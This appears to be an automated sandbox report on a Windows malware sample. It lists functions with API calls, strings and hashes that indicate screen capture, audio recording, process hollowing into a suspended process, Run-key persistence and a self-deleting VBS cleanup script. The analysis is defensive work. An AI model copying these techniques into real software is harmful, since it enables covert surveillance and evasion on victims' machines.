Instruction Fuzzy Hash: B51127772C109147D618CA2DD8BC2BFA785EBCA16972F437AD8828B758D363E17DD600

Function 00438770 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 78f0f7b5b7642c22d8ee35c169576c4e0068381375f86828a5140fd971b96714
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 9311E6BB24034143D6088A2DCCB85B7E797EADD321F7D626FF0424B758DB2AA9459608

Function 02130D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 960014300b2d30d890b4ae01b3da0a23d255d18ceb4a23cca36f7ba25e6d94a1
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 2E01D676B506048FDF22CF24C814BAA33F6FF8A216F5544B9D90AD7381E774A941CB90

Function 00418E76 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
CreateCompatibleDC.GDI32(00000000), ref: 00418E9D

Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
DeleteDC.GDI32(00000000), ref: 00418F2A
DeleteDC.GDI32(00000000), ref: 00418F2D
DeleteObject.GDI32(00000000), ref: 00418F30
SelectObject.GDI32(00000000,00000000), ref: 00418F51
DeleteDC.GDI32(00000000), ref: 00418F62
DeleteDC.GDI32(00000000), ref: 00418F65
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
GetCursorInfo.USER32(?), ref: 00418FA7
GetIconInfo.USER32(?,?), ref: 00418FBD
DeleteObject.GDI32(?), ref: 00418FEC
DeleteObject.GDI32(?), ref: 00418FF9
DrawIcon.USER32(00000000,?,?,?), ref: 00419006
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
DeleteDC.GDI32(?), ref: 0041917C
DeleteDC.GDI32(00000000), ref: 0041917F
DeleteObject.GDI32(00000000), ref: 00419182
GlobalFree.KERNEL32(?), ref: 0041918D
DeleteObject.GDI32(00000000), ref: 00419241
GlobalFree.KERNEL32(?), ref: 00419248
DeleteDC.GDI32(?), ref: 00419258
DeleteDC.GDI32(00000000), ref: 00419263

Strings

DISPLAY, xrefs: 00418E89

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 4256916514-865373369
Opcode ID: 037402f2422a808cfc4c290354e33ea62e5a0ff75ed761640f30c710d9cbb8da
Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
Opcode Fuzzy Hash: 037402f2422a808cfc4c290354e33ea62e5a0ff75ed761640f30c710d9cbb8da
Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A

Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
GetProcAddress.KERNEL32(00000000), ref: 00418139
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
GetProcAddress.KERNEL32(00000000), ref: 0041814D
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
GetProcAddress.KERNEL32(00000000), ref: 00418161
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
GetProcAddress.KERNEL32(00000000), ref: 00418175
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
GetThreadContext.KERNEL32(?,00000000), ref: 00418245
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
TerminateProcess.KERNEL32(?,00000000), ref: 00418301
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
SetThreadContext.KERNEL32(?,00000000), ref: 00418428
ResumeThread.KERNEL32(?), ref: 00418435
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
GetCurrentProcess.KERNEL32(?), ref: 00418457
TerminateProcess.KERNEL32(?,00000000), ref: 00418472
GetLastError.KERNEL32 ref: 0041847A

Strings

ZwCreateSection, xrefs: 0041811C
ZwClose, xrefs: 00418163
ZwMapViewOfSection, xrefs: 0041813B
ntdll, xrefs: 00418121, 00418140, 00418154, 00418168
ZwUnmapViewOfSection, xrefs: 0041814F

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
ExitProcess.KERNEL32 ref: 0040D7D0

Strings

Temp, xrefs: 0040D580
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D471
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D5AA
8SG, xrefs: 0040D4CF
dMG, xrefs: 0040D45B
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D701
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D4C2
On Error Resume Next, xrefs: 0040D5B9
""", 0, xrefs: 0040D6E7
open, xrefs: 0040D7BE
exepath, xrefs: 0040D4F7
0qF, xrefs: 0040D78C, 0040D797
while fso.FileExists(", xrefs: 0040D5EC
"), xrefs: 0040D5D5
fso.DeleteFolder ", xrefs: 0040D6AB
\update.vbs, xrefs: 0040D57B
0qF, xrefs: 0040D737, 0040D778, 0040D661, 0040D68E
fso.DeleteFile ", xrefs: 0040D63A
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D773
wend, xrefs: 0040D689

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-332907002
Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E

Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
ExitProcess.KERNEL32 ref: 0040D419

Strings

pth_unenc, xrefs: 0040D09C
Temp, xrefs: 0040D246
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D0E7
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D285
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D138
On Error Resume Next, xrefs: 0040D294
open, xrefs: 0040D40C
exepath, xrefs: 0040D181
while fso.FileExists(", xrefs: 0040D2C8
"), xrefs: 0040D2B1
hpF, xrefs: 0040D38F
fso.DeleteFolder ", xrefs: 0040D38A
8SG, xrefs: 0040D15E
fso.DeleteFile ", xrefs: 0040D315
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D3C1
dMG, xrefs: 0040D0D1
wend, xrefs: 0040D364
.vbs, xrefs: 0040D201

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2557013105
Opcode ID: 6244c65f73e78a5a67b2f04403325a7d22d13dc486c5db551649454c2a09cddf
Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
Opcode Fuzzy Hash: 6244c65f73e78a5a67b2f04403325a7d22d13dc486c5db551649454c2a09cddf
Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E

Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
ExitProcess.KERNEL32(00000000), ref: 004124A0
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
CloseHandle.KERNEL32(00000000), ref: 0041253B
GetCurrentProcessId.KERNEL32 ref: 00412541
PathFileExistsW.SHLWAPI(?), ref: 00412572
GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
lstrcatW.KERNEL32(?,.exe), ref: 00412601

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
Sleep.KERNEL32(000001F4), ref: 00412682
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
CloseHandle.KERNEL32(00000000), ref: 004126A9
GetCurrentProcessId.KERNEL32 ref: 004126AF

Strings

8SG, xrefs: 004124A6
temp_, xrefs: 004125E3
.exe, xrefs: 004125F5
open, xrefs: 0041263B
exepath, xrefs: 004124CC
WDH, xrefs: 00412548, 004126B6

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: .exe$8SG$WDH$exepath$open$temp_
API String ID: 2649220323-436679193
Opcode ID: aa564c25d172a20a9941fe4372b1d59f4b40d311956c8498164fadd3bd3a5051
Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
Opcode Fuzzy Hash: aa564c25d172a20a9941fe4372b1d59f4b40d311956c8498164fadd3bd3a5051
Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D

Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
SetEvent.KERNEL32 ref: 0041B219
WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
CloseHandle.KERNEL32 ref: 0041B23A
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266

Strings

play audio, xrefs: 0041B14B
status audio mode, xrefs: 0041B1F7
close audio, xrefs: 0041B261
stopped, xrefs: 0041B202
NG, xrefs: 0041B109, 0041B08B
stop audio, xrefs: 0041B257
" type , xrefs: 0041B0D5
alias audio, xrefs: 0041B0B8
open ", xrefs: 0041B0D0
pause audio, xrefs: 0041B1CA
resume audio, xrefs: 0041B1E2

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
API String ID: 738084811-2094122233
Opcode ID: 9a4bdde4670945af81936996cccabb001b6e31b8a76bcce743074723b36ecdbc
Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
Opcode Fuzzy Hash: 9a4bdde4670945af81936996cccabb001b6e31b8a76bcce743074723b36ecdbc
Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E

Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7

Strings

RIFF, xrefs: 00401AFD
fmt , xrefs: 00401B2D
data, xrefs: 00401BB1
WAVE, xrefs: 00401B1D

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3

Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\ltlbVjClX9.exe,00000001,0040764D,C:\Users\user\Desktop\ltlbVjClX9.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
GetProcAddress.KERNEL32(00000000), ref: 0040728D
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
GetProcAddress.KERNEL32(00000000), ref: 004072A5
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
GetProcAddress.KERNEL32(00000000), ref: 004072B9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
GetProcAddress.KERNEL32(00000000), ref: 004072CD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
GetProcAddress.KERNEL32(00000000), ref: 004072E1
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
GetProcAddress.KERNEL32(00000000), ref: 004072F5

Strings

RtlAcquirePebLock, xrefs: 004072C4
NtAllocateVirtualMemory, xrefs: 0040729C
NtFreeVirtualMemory, xrefs: 004072B0
RtlReleasePebLock, xrefs: 004072D8
LdrEnumerateLoadedModules, xrefs: 004072EC
ntdll.dll, xrefs: 00407278, 00407283, 004072A1, 004072B5, 004072C9, 004072DD, 004072F1
C:\Users\user\Desktop\ltlbVjClX9.exe, xrefs: 00407271
RtlInitUnicodeString, xrefs: 0040727E

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Users\user\Desktop\ltlbVjClX9.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-2247553539
Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D

Function 021426DC Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000), ref: 021426FB
ExitProcess.KERNEL32(00000000), ref: 02142707
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02142781
OpenProcess.KERNEL32(00100000,00000000,?), ref: 02142790
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0214279B
CloseHandle.KERNEL32(00000000), ref: 021427A2
GetCurrentProcessId.KERNEL32 ref: 021427A8
PathFileExistsW.SHLWAPI(?), ref: 021427D9
GetTempPathW.KERNEL32(00000104,?), ref: 0214283C
GetTempFileNameW.KERNEL32(?,0046C57C,00000000,?), ref: 02142856
lstrcatW.KERNEL32(?,0046C588), ref: 02142868

Part of subcall function 0214C658: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0214C777,00000000,00000000,?), ref: 0214C697

Sleep.KERNEL32(000001F4), ref: 021428E9
OpenProcess.KERNEL32(00100000,00000000,?), ref: 021428FE
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02142909
CloseHandle.KERNEL32(00000000), ref: 02142910
GetCurrentProcessId.KERNEL32 ref: 02142916

Strings

WDH, xrefs: 021427AF, 0214291D
exepath, xrefs: 02142733
8SG, xrefs: 0214270D

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExistsExitMutexNameSleeplstrcat
String ID: 8SG$WDH$exepath
API String ID: 1507772987-3485537677
Opcode ID: 228c93d50454e450ecda1ae71df249c9f573daf7df6325122599a957f612c681
Instruction ID: 5a97e1a1603c89ce3a3d37d03dd278fec7e590a2e4c944b6d7dc8da34ee0fd18
Opcode Fuzzy Hash: 228c93d50454e450ecda1ae71df249c9f573daf7df6325122599a957f612c681
Instruction Fuzzy Hash: 0B51A471A80315BFDB14BBA09C88EFE336EAB14711F1041A6FD09A71D1EF749E858B58

Function 021490DD Relevance: 30.3, APIs: 20, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(0046C878,00000000,00000000,00000000), ref: 021490F7
CreateCompatibleDC.GDI32(00000000), ref: 02149104

Part of subcall function 0214958C: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 021495BC

CreateCompatibleBitmap.GDI32(00000000,?), ref: 0214917A
DeleteObject.GDI32(00000000), ref: 02149197
SelectObject.GDI32(00000000,00000000), ref: 021491B8
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 021491F0
GetCursorInfo.USER32(?), ref: 0214920E
GetIconInfo.USER32(?,?), ref: 02149224
DeleteObject.GDI32(?), ref: 02149253
DeleteObject.GDI32(?), ref: 02149260
DrawIcon.USER32(00000000,?,?,?), ref: 0214926D
BitBlt.GDI32(00000000,00000000,00000000,?,?,00473198,00000000,00000000,00660046), ref: 021492A3
GetObjectA.GDI32(00000000,00000018,?), ref: 021492CF
LocalAlloc.KERNEL32(00000040,00000001), ref: 0214933C
GlobalAlloc.KERNEL32(00000000,?), ref: 021493AB
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 021493CF
DeleteObject.GDI32(00000000), ref: 021493E9
GlobalFree.KERNEL32(?), ref: 021493F4
DeleteObject.GDI32(00000000), ref: 021494A8
GlobalFree.KERNEL32(?), ref: 021494AF

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

